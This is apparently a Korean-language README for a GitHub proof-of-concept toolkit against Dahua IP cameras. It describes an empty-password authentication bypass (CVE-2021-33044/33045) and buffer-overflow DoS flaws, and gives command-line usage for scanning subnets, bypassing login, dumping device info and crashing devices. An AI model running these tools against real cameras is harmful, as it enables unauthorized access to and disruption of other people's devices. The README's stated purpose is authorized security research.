
Dahua IP 카메라 CVE 연구 툴킷 (CVE-2021-33044/33045, CVE-2025-31700/31701)
⚠️ 개발 중 — 이 스크립트들은 공개된 CVE 정보를 기반으로 작성되었으며, 취약한 장치에 대한 추가 테스트를 통해 전체 기능을 확인해야 합니다.
다후아 IP 카메라의 네 가지 심각한 취약점에 대한 연구 및 개념 증명(PoC) 스크립트입니다.
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.
By using these tools, you agree that:
1. You have EXPLICIT WRITTEN AUTHORIZATION to test the target systems
2. You will NOT use these tools for illegal activities
3. You accept full responsibility for your actions
4. The authors are NOT liable for any misuse or damage
Unauthorized access to computer systems is a CRIMINAL OFFENSE in most jurisdictions.
| CVE | CVSS | 유형 | 상태 |
|---|---|---|---|
| CVE-2021-33044 | 9.8 치명적(Critical) | 인증 우회 | CISA KEV (활발히 악용 중) |
| CVE-2021-33045 | 9.8 치명적(Critical) | 인증 우회 | CISA KEV (활발히 악용 중) |
| CVE-2025-31700 | 8.1 높음(High) | 버퍼 오버플로 DoS | 최근 (2025) |
| CVE-2025-31701 | 8.1 높음(High) | 버퍼 오버플로 DoS | 최근 (2025) |
다후아 카메라는 /RPC2_Login을 통해 챌린지-응답(challenge-response) 인증을 사용합니다:
Normal Login:
step1 = MD5("admin:realm:PASSWORD")
step2 = MD5("step1:random:step1")
Bypass (CVE-2021-33044/45):
step1 = MD5("admin:realm:") ← EMPTY password
step2 = MD5("step1:random:step1")
취약한 펌웨어는 빈 암호 해시를 수락하고 유효한 세션 토큰을 반환합니다.
# Clone repository
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit
# Install dependencies
pip install requests
# Scan subnet (ports required)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081
# Single host with port
python dahua_scanner.py 192.168.1.100:8081
# Full options
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json
# Show help
python dahua_scanner.py --help
일반적인 다후아 포트: 80, 8000, 8080, 8081, 8888, 9000, 443, 37777
python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044 # Single CVE
python dahua_exploit.py --help
python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump # Dump device info after bypass
python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http # HTTP only
python dahua_rce.py 192.168.1.100 --cve tcp # TCP/37777 only
⚠️ 경고: DoS 스크립트는 대상 장치를 충돌시킬 수 있습니다.
requests
그 외 모든 import는 Python 표준 라이브러리에서 가져옵니다:
socket, struct, hashlib, threading, ipaddress, argparse, json
🚧 활발히 개발 중
이 스크립트들은 다음을 기반으로 개발되었습니다:
테스트 현황:
테스트를 위해 취약 장치에 접근할 수 있다면 기여와 피드백을 환영합니다.
문제나 오탐(false positive)이 있으면 보고해 주세요.
MIT 라이선스 — LICENSE 파일을 참조하세요.
Umair Aziz
GitHub: @umair-aziz025
교육 및 승인된 보안 연구 목적으로만 사용하세요.
| 파일 | 용도 | 대상 CVE |
|---|
dahua_scanner.py | 네트워크 탐색 — 서브넷에서 다후아 카메라 검색 | 탐지 |
dahua_exploit.py | 멀티 CVE 스캐너 — 모든 취약점 테스트 | 전체 |
dahua_auth_bypass.py | --dump 옵션을 지원하는 전용 인증 우회 | CVE-2021-33044/45 |
dahua_rce.py | 버퍼 오버플로 DoS 프로브 | CVE-2025-31700/01 |